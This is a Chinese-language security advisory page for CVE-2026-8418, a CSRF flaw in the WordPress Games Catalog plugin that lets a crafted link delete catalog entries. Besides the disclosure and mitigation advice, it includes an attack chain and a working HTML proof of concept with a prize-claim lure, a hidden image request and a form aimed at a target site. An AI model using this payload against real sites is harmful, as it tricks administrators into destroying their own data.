CVE-2026-8418 CVSS 4.3 中危

CVE-2026-8418 WordPress游戏目录插件CSRF漏洞

披露日期: 2026-05-20

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-8418

漏洞类型

跨站请求伪造 (CSRF)

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

WordPress Games Catalog 插件

漏洞概述

WordPress Games Catalog 插件在版本 1.2.0 及以下存在跨站请求伪造（CSRF）漏洞。该漏洞源于 `gc_crud()` 函数在处理删除请求时，未正确调用 `wp_verify_nonce()` 或 `check_admin_referer()` 进行验证。未经身份验证的攻击者可诱导网站管理员点击恶意链接，从而在管理员不知情的情况下删除任意游戏目录条目及关联的 WordPress 文章，造成数据完整性受损。

技术细节

该漏洞的核心在于 WordPress 插件开发中关键安全机制的缺失。在受影响版本的 `admin-crud.php` 文件中，`gc_crud()` 函数负责处理数据的增删改查操作。当 `action` 参数被设置为 `delete` 时，程序直接根据传入的 ID 执行删除逻辑，而完全跳过了 WordPress 标准的安全检查流程。具体而言，代码中未调用 `wp_verify_nonce()` 或 `check_admin_referer()` 函数来验证请求的 Token（Nonce），导致无法区分请求是由管理员本人发起还是由第三方伪造。
利用方式主要依赖于社会工程学攻击。由于该操作通过 GET 请求触发，攻击者可以构造一个包含特制 URL 的恶意链接（例如 `admin-crud.php?action=delete&id=TARGET_ID`）。攻击者本身并不需要具备网站的管理权限，但他们可以诱骗已登录的管理员访问该链接。一旦管理员点击，浏览器会自动携带其身份凭证发送请求，服务器误以为是合法操作，进而执行删除指令，导致特定的游戏记录及关联文章被永久移除。

攻击链分析

STEP 1

侦察

攻击者确认目标网站使用了 WordPress 并安装了 Games Catalog 插件（版本 <= 1.2.0）。

STEP 2

构造攻击载荷

攻击者构造一个包含恶意 GET 请求的 URL，该请求指向插件的删除接口（action=delete），并指定要删除的记录 ID。

STEP 3

社会工程学投递

攻击者通过电子邮件或即时通讯工具，将伪装后的恶意链接发送给目标网站的管理员，诱导其点击。

STEP 4

触发漏洞

管理员在已登录的状态下点击链接。浏览器自动携带管理员身份凭证向服务器发送删除请求。

STEP 5

执行破坏

服务器接收到请求后，由于缺少 nonce 验证，误认为是管理员的合法操作，执行删除命令，导致游戏目录数据丢失。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!--
PoC for CVE-2026-8418: CSRF in Games Catalog Plugin
Description: This script demonstrates how an unauthenticated attacker can delete a game entry
by tricking an administrator into clicking a link.
Usage: Replace 'http://target-site' with the actual target URL and '1' with a valid game ID.
-->
<html>
  <body>
    <h2>You have won a prize! Click to claim.</h2>
    <!-- The malicious request can be triggered via an image tag or form submission -->
    <img src="http://target-site/wp-admin/admin.php?page=games-catalog&action=delete&id=1" width="0" height="0" border="0" style="display:none;">
    
    <!-- Or using a simple form to ensure the request is sent -->
    <form action="http://target-site/wp-admin/admin.php" method="GET">
      <input type="hidden" name="page" value="games-catalog" />
      <input type="hidden" name="action" value="delete" />
      <input type="hidden" name="id" value="1" />
      <input type="submit" value="Claim Prize" />
    </form>
  </body>
</html>

影响范围

WordPress Games Catalog Plugin <= 1.2.0

防御指南

临时缓解措施

建议用户立即将 Games Catalog 插件更新至修复了此漏洞的最新版本。如果无法立即更新，应暂时禁用该插件，或者在服务器端配置严格的 Referer 检查以防范外部 CSRF 攻击。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表